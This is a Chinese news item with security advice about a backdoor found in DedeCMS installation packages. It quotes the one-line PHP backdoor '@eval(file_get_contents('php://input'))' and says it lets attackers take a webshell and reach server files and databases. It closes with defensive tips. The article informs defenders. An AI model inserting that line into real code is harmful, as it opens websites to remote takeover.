最新消息，瑞星與 360 今日對外發(fā)布警示，稱國內(nèi)知名的 PHP 開源網(wǎng)站管理系統(tǒng)織夢 CMS（DedeCms）安裝包被發(fā)現(xiàn)植入后門，黑客可通過此后門直接獲得網(wǎng)站的控制權(quán)限，獲取存儲在服務(wù)器上的文件和數(shù)據(jù)庫。

據(jù)第三方權(quán)威統(tǒng)計數(shù)據(jù)顯示，目前約有 50 萬網(wǎng)站使用該dedecms系統(tǒng)搭建，涉及企業(yè)、政府機關(guān)、媒體機構(gòu)、行業(yè)及個人網(wǎng)站等。

安全界人士分析發(fā)現(xiàn)，此類文件被植入一句后門代碼“@eval (file_get_contents ('php://input'));”，黑客只需要構(gòu)造簡單的數(shù)據(jù)包提交到服務(wù)器，就能夠獲取到該網(wǎng)站的 WebShell，通過對服務(wù)器進一步滲透攻擊，進而獲取服務(wù)器的最高權(quán)限，直接訪問服務(wù)器上的文件、數(shù)據(jù)庫等信息。

下面小熊優(yōu)化的小編給出一個相關(guān)建議：

1、盡快轉(zhuǎn)換系統(tǒng)，可以使用pageadmin、動易、wp這類保持續(xù)更新的cms系統(tǒng)、國內(nèi)一些老牌的cms包括dedecms，phpcms、jtbc等已停止更新了，建議不要使用了。

2、盡量不要網(wǎng)上下載不知名的插件，尤其使用wp的網(wǎng)站，大多被黑的都是網(wǎng)上亂用插件導(dǎo)致的。

3、保持系統(tǒng)更新，官方更新的版本及時更新上，不要感覺現(xiàn)在功能夠用了就不更新，有時候更新不僅僅是功能更新，也是安全上的更新。